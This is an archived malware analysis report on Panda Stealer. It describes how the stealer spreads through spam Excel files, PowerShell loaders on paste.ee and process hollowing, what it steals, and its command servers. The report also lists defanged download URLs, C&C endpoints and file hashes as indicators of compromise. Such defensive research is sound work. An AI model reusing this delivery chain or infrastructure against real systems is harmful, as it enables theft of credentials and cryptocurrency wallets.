{
	"id": "976cc83a-edc8-455f-8515-152e3c661de4",
	"created_at": "2026-04-06T00:10:08.880255Z",
	"updated_at": "2026-04-10T03:20:26.688659Z",
	"deleted_at": null,
	"sha1_hash": "464c9eb752ef027101f0c369855a80eeb92c2c87",
	"title": "New Panda Stealer Targets Cryptocurrency Wallets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 636867,
	"plain_text": "New Panda Stealer Targets Cryptocurrency Wallets\r\nBy By: Monte de Jesus, Paul Pajares May 04, 2021 Read time: 4 min (1077 words)\r\nPublished: 2021-05-04 · Archived: 2026-04-05 15:52:35 UTC\r\nIn early April, we observed a new information stealer called Panda Stealer being delivered via spam emails. Based on Trend\r\nMicro's telemetry, United States, Australia, Japan, and Germany were among the most affected countries during a recent\r\nspam wave.\r\nIn early April, we observed a new information stealer called Panda Stealer being delivered via spam emails. Based on Trend\r\nMicro's telemetry, United States, Australia, Japan and Germany were among the most affected countries during a recent\r\nspam wave. A modified fork of the malware Collector Stealer, Panda Stealer also utilizes a fileless approach in its\r\ndistribution to evade detection.\r\nInfection chains\r\nPanda Stealer is deployed through spam emails posing as business quote requests to lure unwary victims into opening\r\nmalicious Excel files. We have identified two infection chains: in one, an .XLSM attachment contains macros that download\r\na loader (Figure 1). Then, the loader downloads and executes the main stealer. \r\nFigure 1. The macros script that downloads the Panda Stealer loader\r\nThe other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command\r\n(Figure 2) to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command (Figure 3).\r\nFigure 2. Excel formula accessing a paste.ee URL via PowerShell command\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 1 of 8\n\nFigure 3. Encoded and decoded PowerShell script from a paste.ee URL\r\nDecoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless\r\npayloads. The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from\r\na paste.ee URL. The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process\r\nand replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL.\r\nOnce installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various\r\ndigital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. Not only does it target cryptocurrency wallets, it\r\ncan steal credentials from other applications such as NordVPN, Telegram, Discord, and Steam. It’s also capable of taking\r\nscreenshots of the infected computer and exfiltrating data from browsers like cookies, passwords, and cards.\r\nIt drops files under %Temp% folder that stores stolen information under randomized file names, which are then sent to a\r\ncommand-and-control (C\u0026C) server. Further analysis of its C\u0026C server leads to a login page for \"熊猫Stealer,\" which\r\ntranslates to “Panda Stealer” (Figure 4), but more domains have been identified with the same login page (Figure 5).\r\nAnother 14 victims were discovered from the logs of one of these servers.\r\nFigure 4. Possible login page for Panda Stealer\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 2 of 8\n\nFigure 5. Other login pages called \"熊猫Stealer\"\r\nAnother 264 files similar to Panda Stealer were found on VirusTotal. More than 140 C\u0026C servers (Table 1) and over 10\r\ndownload sites were used by these samples. Some of the download sites were from Discord, containing files with names\r\nsuch as \"build.exe,\" which indicates that threat actors may be using Discord to share the Panda Stealer build.\r\nSome of the aforementioned download sites are listed below:\r\nhxxp://23.92.213.108/po/tai1.exe\r\nhxxp://83.220.175.66/build.exe\r\nhxxps://bingoroll2.net/chirik.exe\r\nhxxp://bingoroll2.net/chirik.exe\r\nhxxp://cryptojora.club/sosi.exe\r\nhxxp://f0522235.xsph.ru/build.exe\r\nhxxp://f0522235.xsph.ru/build2.exe\r\nhxxp://f0522235.xsph.ru/build.exe\r\nhxxp://micromagican.com/chirik.exe\r\nhxxp://repairyou.com/henry.exe\r\nhxxp://traps.ml/build.exe\r\nhxxp://tydaynsosi.ru/loader/23/1kwo.txt\r\nhxxp://tydaynsosi.ru/loader/23/1tgk.txt\r\n \r\nC\u0026C servers Occurrence per unique file\r\nhxxp://cocojambo.collector-steal.ga/collect.php 73\r\nhxxp://f0522235.xsph.ru/collect.php 4\r\nhxxp://guarantte.xyz/collect.php 3\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 3 of 8\n\nhxxp://f0527189.xsph.ru/collect.php 3\r\nhxxp://f0527703.xsph.ru/collect.php 2\r\nhxxp://j1145058.myjino.ru/collect.php 2\r\nhxxp://1wftyu121cwr24v3hswa1234g.tk/collect.php 2\r\nhxxp://f0527262.xsph.ru/collect.php 2\r\nhxxp://steammd0.beget.tech/collect.php 2\r\nTable 1. The top C\u0026C servers used by files that are similar to Panda Stealer\r\nAttribution\r\nBased on one of the active C\u0026C servers (Figure 6), we have identified an IP address that we believe was used by the threat\r\nactor. We believe that this address is assigned to a virtual private server (VPS) rented from Shock Hosting, which the actor\r\ninfected for testing purposes. The VPS may be paid for using cryptocurrency to avoid being traced and uses the online\r\nservice Cassandra Crypter (Figure 7). We have reported this to Shock Hosting, and they confirmed that the server assigned\r\nto this IP address has been suspended.\r\nAnother infected machine was discovered with a history of visiting a Google Drive link, which is also mentioned in a\r\ndiscussion about AZORult log extractor on an underground forum. The same link and unique cookie were observed on both\r\nthe log dumps and the forum, therefore the user who posted on the forum must also have access to that log file.\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 4 of 8\n\nFigure 6. Control panel of an active C\u0026C server\r\nFigure 7. Screenshot taken of the threat actor using Cassandra Crypter\r\nSimilarities with other stealers\r\nPanda Stealer was found to be a variant of Collector Stealeropen on a new tab, which has been sold on some underground\r\nforums and a Telegram channel (Figure 8). Collector Stealer has since been cracked by a Russian threat actor called NCP,\r\nalso known as su1c1deopen on a new tab. Comparing the compiled executables of the cracked Collector Stealer and Panda\r\nStealer shows that the two behave similarly, but have different C\u0026C URLs, build tags, and execution folders (Figure 9).\r\nLike Panda Stealer, Collector Stealer exfiltrates information like cookies, login data, and web data from a compromised\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 5 of 8\n\ncomputer, storing them in an SQLite3 database. It also covers its tracks by deleting its stolen files and activity logs after its\r\nexecution (Figure 10).\r\nFigure 8. Telegram channel that sells Collector Stealer\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 6 of 8\n\nFigure 9. The compiled executable of the cracked Collector Stealer (left) and the Panda Stealer sample (right)\r\nFigure 10. The activity logs of an earlier Collector Stealer version (left) and Panda Stealer (right)\r\nBecause the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can\r\nuse it to create their own customized version of the stealer and C\u0026C panel. Threat actors may also augment their malware\r\ncampaigns with specific features from Collector Stealer. We have also discovered that Panda Stealer has an infection chain\r\nthat uses the same fileless distribution method as the \"Fair\" variant of Phobos ransomwareopen on a new tab to carry out\r\nmemory-based attacks, making it more difficult for security tools to spot.\r\nProtect your network from spammed threats\r\nTo protect systems against fileless threats that use spam emails as vectors, enterprises can use the Trend Micro endpoint\r\nsolutions such as Trend Micro Smart Protection Suitesproducts and Worry-Free™ Business Security. Both solutions protect\r\nusers and businesses from threats by detecting malicious files and spammed messages and blocking all related malicious\r\nURLs.\r\nIndicators of compromise\r\nThere were numerous files, domains, and IP addresses that were involved in this attack. Trend Micro has provided detection\r\nfor the malicious artifacts found in this investigation. A partial list of the notable items is detailed below:\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 7 of 8\n\nSHA256 Trend Micro Detection Name\r\n6413be289cf38c2462bd8c6b8bad47f8d953f399e1ccba30126a1fb70d13a733 Trojan.X97M.PANDASTEAL.AA\r\n4ff1f8a052addbc5a0388dfa7f32cc493d7947c43dc7096baa070bfc4ae0a14e Trojan.Win32.PHOBOS.B\r\n0a9f466fb5526fd512dd48c3ba9551dbd342bdb314a87d5c6f730d3c80041da6 TrojanSpy.X97M.PANDASTEAL.THDABBA\r\n05d38ac5460418b0aa813fc8c582ee5be42be192de10d188332901157c54287c TrojanSpy.Win32.PANDASTEAL.THDABBA\r\n1efa74e72060865ff07bda90c4f5d0c470dd20198de7144960c88cef248c4457 TrojanSpy.Win32.PANDASTEAL.THDABBA\r\nURLs\r\nhxxp://23.92.213.108/po/aXSz3[.]exe\r\nhxxp://23.92.213.108/po/tai1[.]exe\r\nhxxp://prtboss.com/collect[.]php\r\nhxxp://biscosuae[.]com\r\nhxxp://prtanet[.]com\r\nhxxps://paste.ee/r/pLpR9\r\nhxxps://paste.ee/r/Qsowz\r\nhxxps://paste.ee/r/6toiY   \r\nhxxp://cocojambo.collector-steal.ga/collect.php\r\nhxxp://f0522235.xsph.ru/collect.php\r\nhxxp://guarantte.xyz/collect.php\r\nhxxp://f0527189.xsph.ru/collect.php\r\nhxxp://f0527703.xsph.ru/collect.php\r\nhxxp://j1145058.myjino.ru/collect.php\r\nhxxp://1wftyu121cwr24v3hswa1234g.tk/collect.php\r\nhxxp://f0527262.xsph.ru/collect.php\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nhttps://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html"
	],
	"report_names": [
		"new-panda-stealer-targets-cryptocurrency-wallets-.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434208,
	"ts_updated_at": 1775791226,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/464c9eb752ef027101f0c369855a80eeb92c2c87.pdf",
		"text": "https://archive.orkl.eu/464c9eb752ef027101f0c369855a80eeb92c2c87.txt",
		"img": "https://archive.orkl.eu/464c9eb752ef027101f0c369855a80eeb92c2c87.jpg"
	}
}